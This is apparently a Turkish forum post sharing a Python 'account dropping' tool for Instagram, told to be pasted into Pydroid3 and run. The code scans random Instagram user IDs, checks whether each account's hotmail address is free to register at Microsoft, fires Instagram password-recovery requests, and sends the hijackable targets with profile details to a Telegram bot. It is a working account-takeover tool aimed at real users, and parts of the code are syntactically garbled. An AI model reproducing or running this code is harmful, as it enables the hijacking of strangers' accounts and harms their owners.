



Instagram Hesap düşürme Toolu

Uzun zamandır beklediğiniz Instagram eski kurulum hesap düşüren tool sizleri seviyorum canlar ❤️ sizde seviyorsanız 5 tik anında atarsınız

Aşağıdaki yazıyı PYDROİDT3 UYGULAMASINA YAPIŞTIRIN VE BAŞLATIN SORUN YAŞAYANLAR BANA ULAŞABİLİR

```
print(('—'*30)+'\n• By • @Eizonhack • @Eiz0n •\n'+('—'*30))
import webbrowser
webbrowser.open('https://t.me/Eizonhack')
import requests,re,random,os,sys
from rich import print as g
from rich.panel import Panel
from threading import Thread
#####Beplor Tools#####
R = '\033[1;31;40m' # Kırmızı
X = '\033[1;33;40m' # Sarı
F = '\033[1;32;40m' # Yeşil
C = "\033[1;97;40m" # Beyaz
C = "\033[1;97;40m" # Beyaz
B = '\033[1;36;40m' # Mavi
K = '\033[1;35;40m' # Mor
V = '\033[1;36;40m' # Turkuaz
#####Beplor Tools#####
print(X + ")
nnn = random.choice([R,X,F,B,K,V])
good_hot,bad_hot,good_ig,bad_ig,check,mj,ids=0,0,0,0,0,0,[]
tok = input('• {}BOT{} ♪ {}TOKEN : {}'.format(B,C,V,K))
print("\r")
print(('—'*30)+'\n• By • @Eizonhack • @Eiz0n •\n'+('—'*30))
iD = input('• {}ID{} ♪ {}BOT : {}'.format(B,C,V,K))
```

```

os.system('clear')
print(('—'*30)+'\n• By • @Eizonhack • @Eiz0n •\n'+('—'*30))
def cookie(email):
    versions = ["13.1.2", "13.1.1", "13.0.5", "12.1.2", "12.0.3"]
    oss = [
        "Macintosh; Intel Mac OS X 10_15_7",
        "Macintosh; Intel Mac OS X 10_14_6",
        "iPhone; CPU iPhone OS 14_0 like Mac OS X",
        "iPhone; CPU iPhone OS 13_6 like Mac OS X"]
    version = random.choice(versions)
    platform = random.choice(oss)
    user_agent = f"Mozilla/5.0 ({platform}) AppleWebKit/605.1.15 (KHTML, like Gecko)
Version/{version} Safari/605.1.15 Edg/122.0.0.0"
    try:
        url = 'https://signup.live.com'
        headers={'user-agent': user_agent}
        response = requests.post(url,headers=headers)
        amsc = response.cookies.get_dict()['amsc']
        match = re.search(r"apiCanary":"(.*?)", response.text)
        if match:
            api_canary= match.group(1)
            canary = api_canary.encode().decode('unicode_escape')
        else:pass
        return amsc,canary
    except :
        check_hot(email)

```

```

def insta1(email):
    global good_ig,bad_ig
    try:
        app="".join(random.choice('1234567890')for i in range(15))
        response = requests.get('https://www.instagram.com/api/graphql')
        csrf = response.cookies.get_dict().get('csrftoken')
        rnd=str(random.randint(150, 999))
        user_agent = "Instagram 311.0.0.32.118 Android (" + ["23/6.0", "24/7.0", "25/7.1.1", "26/8.0",
"27/8.1", "28/9.0"][random.randint(0, 5)] + "; " + str(random.randint(100, 1300)) + "dpi; " +
str(random.randint(200, 2000)) + "x" + str(random.randint(200, 2000)) + "; " + ["SAMSUNG",
"HUAWEI", "LGE/lge", "HTC", "ASUS", "ZTE", "ONEPLUS", "XIAOMI", "OPPO", "VIVO",

```

```

"SONY", "REALME"]][random.randint(0, 11)] + "; SM-T" + rnd + "; SM-T" + rnd + "; qcom;
en_US; 545986"+str(random.randint(111,999))+")"
    common_data = {'flow': 'fxcal','recaptcha_challenge_field': "",}
    data = {'email_or_username': email + "@hotmail.com", **common_data}
    headers = {'authority': 'www.instagram.com','accept': '*/','accept-language': 'ar-
AE,ar;q=0.9,en-US;q=0.8,en;q=0.7','content-type': 'application/x-www-form-urlencoded','user-
agent': user_agent,'viewport-width': '384','x-asbd-id': '129477','x-csrf-token': f'{csrf}','x-ig-app-id':
app,'x-ig-www-claim': '0','x-instagram-ajax': '1007832499','x-requested-with':
'XMLHttpRequest'}
    response =
requests.post('https://www.instagram.com/api/v1/web/accounts/account_recovery_send_ajax/'
, headers=headers, data=data)
    if 'email_or_sms_sen' in response.text :
        good_ig+=1
        check_hot(email)
    else:
        bad_ig+=1
except requests.exceptions.ConnectionError:
    insta1(email)

```

```

def insta2(email):
    bb =0
    global good_ig,bad_ig
    try:
        rnd=str(random.randint(150, 999))
        user_agent = "Instagram 311.0.0.32.118 Android (" + ["23/6.0", "24/7.0", "25/7.1.1", "26/8.0",
"27/8.1", "28/9.0"]][random.randint(0, 5)] + "; " + str(random.randint(100, 1300)) + "dpi; " +
str(random.randint(200, 2000)) + "x" + str(random.randint(200, 2000)) + "; " + ["SAMSUNG",
"HUAWEI", "LGE/lge", "HTC", "ASUS", "ZTE", "ONEPLUS", "XIAOMI", "OPPO", "VIVO",
"SONY", "REALME"]][random.randint(0, 11)] + "; SM-T" + rnd + "; SM-T" + rnd + "; qcom;
en_US; 545986"+str(random.randint(111,999))+")"
        url = 'https://www.instagram.com/api/v1/web/accounts/check_email/'
        head= {
            'Host': 'www.instagram.com',
            'origin': 'https://www.instagram.com',
            'referer': 'https://www.instagram.com/accounts/signup/email/',
            'sec-ch-ua-full-version-list': '"Android WebView";v="119.0.6045.163",
"Chromium";v="119.0.6045.163", "Not?A_Brand";v="24.0.0.0"',
            'user-agent': user_agent}

```

```

data = {
'email':email+"@hotmail.com"
}
res= requests.post(url,headers=head,data=data)
if 'email_is_taken' in res.text:
good_ig+=1
check_hot(email)
else:
bad_ig+=1
except requests.exceptions.ConnectionError:
insta2(email)

```

```

def check_hot(email):
global good_hot,bad_hot
versions = ["13.1.2", "13.1.1", "13.0.5", "12.1.2", "12.0.3"]
oss = [
"Macintosh; Intel Mac OS X 10_15_7",
"Macintosh; Intel Mac OS X 10_14_6",
"iPhone; CPU iPhone OS 14_0 like Mac OS X",
"iPhone; CPU iPhone OS 13_6 like Mac OS X"]
version = random.choice(versions)
platform = random.choice(oss)
user_agent = f"Mozilla/5.0 ({platform}) AppleWebKit/605.1.15 (KHTML, like Gecko)
Version/{version} Safari/605.1.15 Edg/122.0.0.0"
try:
amsc,canary = cookie(email)
headers = {
'authority': 'signup.live.com',
'accept': 'application/json',
'accept-language': 'en-US,en;q=0.9',
'canary': canary,
'user-agent': user_agent,
}
cookies = {
'amsc':amsc
}
data = {
'signInName': email+"@hotmail.com",
}

```

```

response = requests.post(
'https://signup.live.com/API/CheckAvailableSigninNames',cookies=cookies,headers=headers,j
son=data)
    if 'isAvailable' in response.text:
        good_hot+=1
        hunting(email)
    else:
        pass
except requests.exceptions.ConnectionError:
    check_hot(email)

def date_sc(Id):
    try:
        if int(Id) >1 and int(Id)<1279000:
            return 2010
        elif int(Id)>1279001 and int(Id)<17750000:
            return 2011
        elif int(Id) > 17750001 and int(Id)<279760000:
            return 2012
        elif int(Id)>279760001 and int(Id)<900990000:
            return 2013

    except BaseException as princess :
        return princess

def hunting(email):
    try:
        headers = {
            'X-Pigeon-Session-Id': '50cc6861-7036-43b4-802e-fb4282799c60',
            'X-Pigeon-Rawclienttime': '1700251574.982',
            'X-IG-Connection-Speed': '-1kbps',
            'X-IG-Bandwidth-Speed-KBPS': '-1.000',
            'X-IG-Bandwidth-TotalBytes-B': '0',
            'X-IG-Bandwidth-TotalTime-MS': '0',
            'X-Bloks-Version-Id':
'009f03b18280bb343b0862d663f31ac80c5fb30dfae9e273e43c63f13a9f31c0',

```

```
'X-IG-Connection-Type': 'WIFI',
'X-IG-Capabilities': '3brTvw==',
'X-IG-App-ID': '567067343352427',
'User-Agent': 'Instagram 100.0.0.17.129 Android (29/10; 420dpi; 1080x2129; samsung; SM-
M205F; m20lte; exynos7904; en_GB; 161478664)',
'Accept-Language': 'en-GB, en-US',
'Cookie': 'mid=ZVfGvgABAAGoQqa7AY3mgoYBV1nP;
csrftoken=9y3N5kLqzialQA7z96AMiyAKLMBWpqVj',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding': 'gzip, deflate',
'Host': 'i.instagram.com',
'X-FB-HTTP-Engine': 'Liger',
'Connection': 'keep-alive',
'Content-Length': '356',
}
data = {
    'signed_body': '0d067c2f86cac2c17d655631c9cec2402012fb0a329bcafb3b1f4c0bb56b1f1f.
{"_csrftoken":"9y3N5kLqzialQA7z96AMiyAKLMBWpqVj","adid":"0dfaf820-2748-4634-9365-
c3d8c8011256","guid":"1f784431-2663-4db9-b624-86bd9ce1d084","device_id":"android-
b93ddb37e983481c","query":"","email+"}',
    'ig_sig_key_version': '4',
}
try:
    response =
requests.post('https://i.instagram.com/api/v1/accounts/send_recovery_flow_email/',headers=h
eaders,data=data,)
    rest = response.json()['email']
except :
    rest = False
try:
    info=requests.get('https://anonyig.com/api/ig/userInfoByUsername/'+email).json()
except :
    info = None
try:
    Id =info['result']['user']['pk_id']
except :
    Id = None
try:
    followers = info['result']['user']['follower_count']
```

except :

followers = None

try:

following = info['result']['user']['following_count']

except :

following = None

try:

post = info['result']['user']['media_count']

except :

post = None

try:

name = info['result']['user']['full_name']

except :

name = None

date = date_sc(Id)

requests.post(f"\"https://api.telegram.org/bot{tok}/sendvideo?chat_id=

{iD}&parse_mode=MarkdownV2&video=https://t.me/yyyyyy3w/15&caption=*• Cehennem Geliyor...

• ||Ben En İyisi Olacağım.||*

\"");hunt = (\"

Beplor I got you an account !

• By • @Beplortools • @Eiz0n •

Ad : {}

Soyad : {}

Mail : {}@hotmail.com

Takipçi : {}

Takip Edilen : {}

ID : {}

Kurulum : {}

Post : {}

Reset : {}

• By • @Eizonhack • @Eiz0n •

\".format(name,email,email,followers,following,Id,date,post,rest))

requests.post(f"\"https://api.telegram.org/bot{tok}/sendMessage?chat_id={iD}&text="+str(hunt))

print(nnn)

hunt2 = (\"

EizonI got you an account !

Ad : {}

Soyad : {}

Mail : {}@hotmail.com

Takipçi : {}

Takip Edilen : {}

ID : {}

Kurulum : {}

Post : {}

Reset : {}

• By • @Eizonhack • @Eiz0n•

```
"".format(name,email,email,followers,following,Id,date,post,rest))
```

```
Hit = Panel(hunt2);g(Panel(Hit, title=f"Instagram | {good_hot}"))
```

except :

```
    hunting(email)
```

```
def check_email(email):
```

```
    global good_hot,bad_hot,bad_ig,good_ig,check
```

```
    Choice = random.choice(['insta1','insta2'])
```

```
    if Choice != 'insta2':
```

```
        insta1(email)
```

```
    else :
```

```
        insta2(email)
```

```
    b = random.randint(5,208)
```

```
    bo = f'\x1b[38;5;{b}m'
```

```
    check+=1
```

```
    sys.stdout.write(f"\r {bo}[ {C}Beplor {bo}] {C}Working : {F}{good_hot} {C}unemployed : {R}{bad_ig} {C}Güzel IG : {X}{good_ig} {C}{bo}Denetlenen•{check}\r")
```

```
    sys.stdout.flush()
```

```
def rand_ids():
```

```
    Id= str(random.randrange(128053904,438909537))
```

```
    if Id not in ids:
```

```
        ids.append(Id)
```

```
        return Id
```

```
    else:
```

```
        rand_ids()
```

```
def username1():
```

```
    global check
```

```
    try:
```

```

while True:
    rnd=str(random.randint(150, 999))
    user_agent = "Instagram 311.0.0.32.118 Android (" + ["23/6.0", "24/7.0", "25/7.1.1",
"26/8.0", "27/8.1", "28/9.0"][random.randint(0, 5)] + "; " + str(random.randint(100, 1300)) + "dpi;
" + str(random.randint(200, 2000)) + "x" + str(random.randint(200, 2000)) + "; " +
["SAMSUNG", "HUAWEI", "LGE/lge", "HTC", "ASUS", "ZTE", "ONEPLUS", "XIAOMI",
"OPPO", "VIVO", "SONY", "REALME"][random.randint(0, 11)] + "; SM-T" + rnd + "; SM-T" +
rnd + "; qcom; en_US; 545986"+str(random.randint(111,999))+")"
    Id = rand_ids()

lsd=".join(random.choice('azertyuiopmlkjhgfdsqwxcvbnAZERTYUIOPMLKJHGFDSQWXCVB
N1234567890') for _ in range(32))
    headers = {
'accept': '*/*',
'accept-language': 'en,en-US;q=0.9',
'content-type': 'application/x-www-form-urlencoded',
'dnt': '1',
'origin': 'https://www.instagram.com',
'priority': 'u=1, i',
'referer': 'https://www.instagram.com/cristiano/following/',
'user-agent': user_agent,
'x-fb-friendly-name': 'PolarisUserHoverCardContentV2Query',
'x-fb-lsd': lsd,
}
    data = {
'lsd': lsd,
'fb_api_caller_class': 'RelayModern',
'fb_api_req_friendly_name': 'PolarisUserHoverCardContentV2Query',
'variables': '{"userID":""+str(Id)+"","username":"cristiano"}',
'server_timestamps': 'true',
'doc_id': '7717269488336001',
}
    response = requests.post('https://www.instagram.com/api/graphql', headers=headers,
data=data)
    user =response.json()['data']['user']['username']
    check_email(user)
except :
    username1()

```

```
for i in range(10):  
    Thread(target=username1).start()
```

#Tool by, Eizon